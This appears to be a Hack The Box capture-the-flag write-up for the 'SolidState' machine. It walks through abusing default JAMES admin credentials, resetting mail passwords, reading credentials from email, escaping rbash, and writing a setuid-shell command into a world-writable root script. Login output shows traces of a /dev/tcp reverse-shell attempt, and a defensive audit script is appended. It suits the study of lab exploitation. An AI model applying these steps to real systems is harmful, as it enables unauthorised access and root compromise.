SolidState-htb-writeup

0x00 Skills covered in this box

Skills in this chapter: weak JAMES credentials, logging into the mail admin console with nc, resetting mailbox account passwords, SSH login with "bash --noprofile" appended to escape the restricted shell, and using find -perm -0002 to locate world-writable files (filtering /proc/ out of the results).

Reference: https://www.cnblogs.com/jarwu/p/17449447.html

Reference: https://0xdf.gitlab.io/2020/04/30/htb-solidstate.html

0x01 Getting user access

1. Get the target IP address: 10.10.10.51

2. Scan for open ports

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.51
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-04 09:45 CST
Nmap scan report for 10.10.10.51
Host is up (0.33s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
4555/tcp open rsip

Nmap done: 1 IP address (1 host up) scanned in 9.90 seconds


┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
22,25,80,110,119,4555,


┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,25,80,110,119,4555 -Pn --min-rate=10000 10.10.10.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-04 09:56 CST
Nmap scan report for 10.10.10.51
Host is up (0.30s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.4 [10.10.14.4])
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open rsip?
| fingerprint-strings:
| GenericLines:
| JAMES Remote Administration Tool 2.3.2
| Please enter your login and password
| Login id:
| Password:
| Login failed for
|_ Login id:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4555-TCP:V=7.94SVN%I=7%D=1/4%Time=6596105A%P=aarch64-unknown-linux-
SF:gnu%r(GenericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.
SF:3\.2\nPlease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:
SF:\nPassword:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 276.67 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -sU --min-rate=10000 -oG allports1 10.10.10.51
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-04 10:15 CST
Warning: 10.10.10.51 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.51
Host is up (0.30s latency).
All 65535 scanned ports on 10.10.10.51 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 74.58 seconds

3. Several ports are open; let's look at the service on port 80 first.

4. Nothing stands out on the homepage, so let's brute-force directories and see what is there.

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.51
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.51/_24-01-04_10-38-09.txt

Target: http://10.10.10.51/

[10:38:09] Starting:
[10:38:24] 403 - 297B - /.ht_wsr.txt
[10:38:24] 403 - 300B - /.htaccess.bak1
[10:38:24] 403 - 300B - /.htaccess.orig
[10:38:24] 403 - 302B - /.htaccess.sample
[10:38:24] 403 - 301B - /.htaccess_extra
[10:38:24] 403 - 298B - /.htaccessBAK
[10:38:24] 403 - 300B - /.htaccess_orig
[10:38:24] 403 - 300B - /.htaccess.save
[10:38:24] 403 - 298B - /.htaccessOLD
[10:38:24] 403 - 299B - /.htaccessOLD2
[10:38:24] 403 - 291B - /.html
[10:38:24] 403 - 290B - /.htm
[10:38:24] 403 - 298B - /.htaccess_sc
[10:38:25] 403 - 296B - /.htpasswds
[10:38:25] 403 - 300B - /.htpasswd_test
[10:38:25] 403 - 297B - /.httr-oauth
[10:38:40] 200 - 3KB - /about.html
[10:39:09] 301 - 311B - /assets -> http://10.10.10.51/assets/
[10:39:09] 200 - 467B - /assets/
[10:39:46] 200 - 568B - /images/
[10:39:46] 301 - 311B - /images -> http://10.10.10.51/images/
[10:39:54] 200 - 6KB - /LICENSE.txt
[10:40:24] 200 - 606B - /README.txt
[10:40:30] 403 - 300B - /server-status/
[10:40:30] 403 - 299B - /server-status

Task Completed

5. Nothing was found here either, so the entry point is not the web server but one of the other open ports.

6. In the port scan results, port 4555 appears to prompt for a username and password; let's search Baidu to see what this service is.

JAMES Remote Administration Tool 2.3.2

James is an Apache open-source project: a portable, secure, 100% pure Java enterprise mail server built by the Apache foundation.

7. So it is a mail server. The Baidu search also turned up the service's default password, and from there the commands for changing account passwords.

Known root credentials (default account root:root)

8. Next, connect to the port 4555 service with nc and change the passwords of the relevant accounts.

┌──(kali㉿kali)-[~/桌面]
└─$ nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
setpassword thomas 123
Password for thomas reset
setpassword john 123
Password for john reset
set password mindy 123
Unknown command set password mindy 123
setpassword mindy 123
Password for mindy reset
setpassword mailadmin 123
Password for mailadmin reset
quit
Bye

9. I reset every discovered account's password to 123, and then naively assumed I could try logging in over SSH with them.

┌──(kali㉿kali)-[~/桌面]
└─$ ssh john@10.10.10.51
The authenticity of host '10.10.10.51 (10.10.10.51)' can't be established.
ED25519 key fingerprint is SHA256:rC5LxqIPhybBFae7BXE/MWyG4ylXjaZJn6z2/1+GmJg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.51' (ED25519) to the list of known hosts.
john@10.10.10.51's password:
Permission denied, please try again.
john@10.10.10.51's password:
Permission denied, please try again.
john@10.10.10.51's password:
john@10.10.10.51: Permission denied (publickey,password).

┌──(kali㉿kali)-[~/桌面]
└─$ ssh thomas@10.10.10.51
thomas@10.10.10.51's password:
Permission denied, please try again.
thomas@10.10.10.51's password:
Permission denied, please try again.
thomas@10.10.10.51's password:
thomas@10.10.10.51: Permission denied (publickey,password).

┌──(kali㉿kali)-[~/桌面]
└─$ ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Permission denied, please try again.
mindy@10.10.10.51's password:
Permission denied, please try again.
mindy@10.10.10.51's password:
mindy@10.10.10.51: Permission denied (publickey,password).

┌──(kali㉿kali)-[~/桌面]
└─$ ssh mailadmin@10.10.10.51
mailadmin@10.10.10.51's password:
Permission denied, please try again.
mailadmin@10.10.10.51's password:
Permission denied, please try again.
mailadmin@10.10.10.51's password:
mailadmin@10.10.10.51: Permission denied (publickey,password).

10. Only now did I realize that what I had changed were just the mail-service account passwords; I had gotten muddled while doing the box.

11. A Baidu search showed that I needed to telnet to port 110 to log into the POP3 service and read the mail.

┌──(kali㉿kali)-[~/桌面]
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
john
-ERR
USER john
+OK
PASS 123
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

12. This revealed mindy as the key account, but I had not yet reset the password of the james account, so I reset it as well.

┌──(kali㉿kali)-[~/桌面]
└─$ nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
setpassword james 123
Password for james reset
setpassword mindy 123
Password for mindy reset
quit
Bye

13. Then I logged into the accounts one by one to look for important information in their mail.

┌──(kali㉿kali)-[~/桌面]
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
USER +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
thomas
+OK
PASS 123
+OK Welcome thomas
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

┌──(kali㉿kali)-[~/桌面]
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
USER +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS 123
-ERR Authentication failed.
USER mailadmin
+OK
PASS 123
+OK Welcome mailadmin
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

┌──(kali㉿kali)-[~/桌面]
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
USER james
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
+OK
PASS 123
+OK Welcome james
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

┌──(kali㉿kali)-[~/桌面]
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
USER mindy
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
+OK
PASS 123
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security.

Respectfully,
James
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

14. In the end, it was in mindy's mailbox that I found a username and password.

username: mindy
pass: P@55W0rd1!2@

15. Next, I tried logging in over SSH.

┌──(kali㉿kali)-[~/桌面]
└─$ ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errorMessagetLjava/lang/String: No such file or directory
-rbash: L
lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <9152149.0.1704334325953.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.4 ([10.10.14.4])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 391
for <../../../../../../../../etc/bash_completion.d@localhost>;
Wed, 3 Jan 2024 21:11:25 -0500 (EST)
Date: Wed, 3 Jan 2024 21:11:25 -0500 (EST)
From: team@team.pl

: No such file or directory
-rbash: connect: Connection refused
-rbash: /dev/tcp/10.10.14.4/443: Connection refused
-rbash: $'\r': command not found
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errorMessagetLjava/lang/String: No such file or directory
-rbash: L
lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <30321308.1.1704334457034.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.4 ([10.10.14.4])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 137
for <../../../../../../../../etc/bash_completion.d@localhost>;
Wed, 3 Jan 2024 21:13:36 -0500 (EST)
Date: Wed, 3 Jan 2024 21:13:36 -0500 (EST)
From: team@team.pl

: No such file or directory
-rbash: connect: Connection refused
-rbash: /dev/tcp/10.10.14.4/443: Connection refused
-rbash: $'\r': command not found
mindy@solidstate:~$ id
-rbash: id: command not found
mindy@solidstate:~$

16. The box looks a bit broken on the program side (note the rbash errors on login), but that does not stop me from getting the first flag.

mindy@solidstate:~$ pwd
/home/mindy
mindy@solidstate:~$
mindy@solidstate:~$ ls
bin user.txt
mindy@solidstate:~$ cat user.txt
4530ac8bfbfb86ba43deb1883dd0a48c
mindy@solidstate:~$

0x02 Getting system (root) access

17. Now begins the painful enumeration; the command restrictions really are miserable.

mindy@solidstate:~$ 
mindy@solidstate:~$ sudo -l
-rbash: sudo: command not found
mindy@solidstate:~$ ls -la
total 28
drwxr-x--- 4 mindy mindy 4096 Apr 26 2021 .
drwxr-xr-x 4 root root 4096 Apr 26 2021 ..
lrwxrwxrwx 1 root root 9 Nov 18 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 0 Aug 22 2017 .bash_logout
-rw-r--r-- 1 root root 338 Aug 22 2017 .bash_profile
-rw-r--r-- 1 root root 1001 Aug 22 2017 .bashrc
drwxr-x--- 2 mindy mindy 4096 Apr 26 2021 bin
-rw------- 1 root root 0 Aug 22 2017 .rhosts
-rw------- 1 root root 0 Aug 22 2017 .shosts
drw------- 2 root root 4096 Apr 26 2021 .ssh
-rw------- 1 mindy mindy 33 Jan 3 20:42 user.txt
mindy@solidstate:~$ cd bin
-rbash: cd: restricted
mindy@solidstate:~$ ls -la bin/
total 8
drwxr-x--- 2 mindy mindy 4096 Apr 26 2021 .
drwxr-x--- 4 mindy mindy 4096 Apr 26 2021 ..
lrwxrwxrwx 1 root root 8 Aug 22 2017 cat -> /bin/cat
lrwxrwxrwx 1 root root 8 Aug 22 2017 env -> /bin/env
lrwxrwxrwx 1 root root 7 Aug 22 2017 ls -> /bin/ls
mindy@solidstate:~$ ls -la .ssh
ls: cannot open directory '.ssh': Permission denied
mindy@solidstate:~$ ss -ltn
-rbash: ss: command not found
mindy@solidstate:~$ ls -la /home
total 16
drwxr-xr-x 4 root root 4096 Apr 26 2021 .
drwxr-xr-x 22 root root 4096 May 27 2022 ..
drwxr-xr-x 16 james osboxes 4096 Apr 26 2021 james
drwxr-x--- 4 mindy mindy 4096 Apr 26 2021 mindy
mindy@solidstate:~$ ls -la /home/james
total 80
drwxr-xr-x 16 james osboxes 4096 Apr 26 2021 .
drwxr-xr-x 4 root root 4096 Apr 26 2021 ..
lrwxrwxrwx 1 root root 9 Apr 26 2021 .bash_history -> /dev/null
-rw-r--r-- 1 james osboxes 220 Jun 18 2017 .bash_logout
-rw-r--r-- 1 james osboxes 3526 Jun 18 2017 .bashrc
drwx------ 8 james osboxes 4096 Apr 26 2021 .cache
drwx------ 10 james osboxes 4096 Apr 26 2021 .config
drwxr-xr-x 2 james osboxes 4096 Apr 26 2021 Desktop
drwxr-xr-x 2 james osboxes 4096 Apr 26 2021 Documents
drwxr-xr-x 2 james osboxes 4096 Apr 26 2021 Downloads
drwx------ 3 james osboxes 4096 Apr 26 2021 .gnupg
-rw------- 1 james osboxes 640 Aug 22 2017 .ICEauthority
drwxr-xr-x 3 james osboxes 4096 Apr 26 2021 .local
drwxr-xr-x 2 james osboxes 4096 Apr 26 2021 Music
drwxr-xr-x 2 james osboxes 4096 Apr 26 2021 .nano
drwxr-xr-x 2 james osboxes 4096 Apr 26 2021 Pictures
-rw-r--r-- 1 james osboxes 675 Jun 18 2017 .profile
drwxr-xr-x 2 james osboxes 4096 Apr 26 2021 Public
drwx------ 2 james osboxes 4096 Apr 26 2021 .ssh
drwxr-xr-x 2 james osboxes 4096 Apr 26 2021 Templates
drwxr-xr-x 2 james osboxes 4096 Apr 26 2021 Videos
mindy@solidstate:~$ id
-rbash: id: command not found
mindy@solidstate:~$ cd
-rbash: cd: restricted
mindy@solidstate:~$ cd /home/james/.config
-rbash: cd: restricted
mindy@solidstate:~$ ls -la /home/james/.config
ls: cannot open directory '/home/james/.config': Permission denied
mindy@solidstate:~$ exit
logout
Connection to 10.10.10.51 closed.

18. Through Baidu I found that passing bash --noprofile when logging in over SSH avoids this problem.

┌──(kali㉿kali)-[~/桌面]
└─$ ssh mindy@10.10.10.51 "bash --noprofile"
mindy@10.10.10.51's password:
sh -i
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$

19. Following the reference walkthrough, a find search for world-writable files turned up a special .py file.

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ find / -perm -0002 -type f -print 2</dev/null | grep -v /proc/
<m -0002 -type f -print 2</dev/null | grep -v /proc/
/opt/tmp.py
/sys/fs/cgroup/memory/cgroup.event_control
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /opt/tmp.py
cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$

https://explainshell.com/explain?cmd=find+%2F+-perm+-0002+-type+f+-print+2%3C%2Fdev%2Fnull+%7C+grep+-v+%2Fproc%2F

20. The file is writable by everyone, so by writing our own command into it we can escalate privileges.

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls
ls
bin user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -la /opt/tmp.py
ls -la /opt/tmp.py
-rwxrwxrwx 1 root root 1 Jan 3 22:32 /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo "#!/usr/bin/env python" > /opt/tmp.py
<state:~$ echo "#!/usr/bin/env python" > /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo "import os,sys" >> /opt/tmp.py
<y@solidstate:~$ echo "import os,sys" >> /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo "os.system('cp /bin/sh /home/mindy/sh && chmod 4777 /home/mindy/sh')" >> /opt/tmp.py
<y/sh && chmod 4777 /home/mindy/sh')" >> /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /opt/tmp.py
cat /opt/tmp.py
#!/usr/bin/env python
import os,sys
os.system('cp /bin/sh /home/mindy/sh && chmod 4777 /home/mindy/sh')
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls
ls
bin user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls
ls
bin user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls
ls
bin sh user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./sh
./sh
# id
id
uid=1001(mindy) gid=1001(mindy) euid=0(root) groups=1001(mindy)
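
As an added, defender-side example (not code from the original post), the following Python script performs the same world-writable-file audit as the find command in step 19, pruning /proc, /sys and /dev (an assumption that mirrors the post's grep -v /proc/) and ranking a root-owned, executable, world-writable file like /opt/tmp.py as the most severe case. The sample tree it audits is constructed in a temporary directory.

```python
"""World-writable file audit, equivalent to `find / -perm -0002 -type f`.

Added example, not code from the original post or from the box.
"""
import os
import stat
import tempfile
from dataclasses import dataclass

# Pseudo-filesystems that only produce noise (assumption; the post filters /proc/).
SKIP_PREFIXES = ("/proc", "/sys", "/dev")


@dataclass(frozen=True)
class Finding:
    path: str
    uid: int
    mode: int            # full st_mode from lstat
    root_owned: bool
    executable: bool

    @property
    def severity(self) -> str:
        # root-owned + executable + world-writable is the /opt/tmp.py pattern:
        # anyone can plant code that a privileged job will later run.
        if self.root_owned and self.executable:
            return "critical"
        if self.root_owned:
            return "high"
        return "medium"


def is_world_writable(mode: int) -> bool:
    """find's -perm -0002: the 'other' write bit is set."""
    return bool(mode & stat.S_IWOTH)


def _skipped(dirpath: str, skip) -> bool:
    return any(dirpath == p or dirpath.startswith(p + "/") for p in skip)


def audit_world_writable(root: str = "/", skip=SKIP_PREFIXES) -> list:
    """Return sorted Findings for every world-writable regular file under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        if _skipped(dirpath, skip):
            dirnames[:] = []          # prune: do not descend into pseudo-fs
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat so symlinks are not followed
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):      # -type f
                continue
            if not is_world_writable(st.st_mode):
                continue
            exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
            findings.append(Finding(path, st.st_uid, st.st_mode,
                                    st.st_uid == 0, bool(st.st_mode & exec_bits)))
    return sorted(findings, key=lambda f: f.path)


def demo() -> list:
    """Constructed sample tree: one 0777 script, one 0644 file, one 0777 dir."""
    base = tempfile.mkdtemp(prefix="ww-audit-")
    for name, mode in (("tmp.py", 0o777), ("notes.txt", 0o644)):
        p = os.path.join(base, name)
        with open(p, "w") as fh:
            fh.write("#!/usr/bin/env python\n")
        os.chmod(p, mode)
    os.makedirs(os.path.join(base, "wdir"), mode=0o777)  # dirs are not -type f
    return audit_world_writable(base, skip=())


if __name__ == "__main__":
    for f in demo():
        print(f"{f.severity:8} {oct(f.mode & 0o7777)} uid={f.uid} {f.path}")
```

Run it as root against "/" on a host you administer to get the same list the walkthrough obtained with find, with ownership and severity attached.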

21. Then read the flag.

# cat /root/root.txt
cat /root/root.txt
1c71cc60d8c95d36754538002c346606
#

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/85


SolidState-htb-writeup
https://sh1yan.top/2024/01/04/SolidState-htb-writeup/
Author: shiyan
Published: January 4, 2024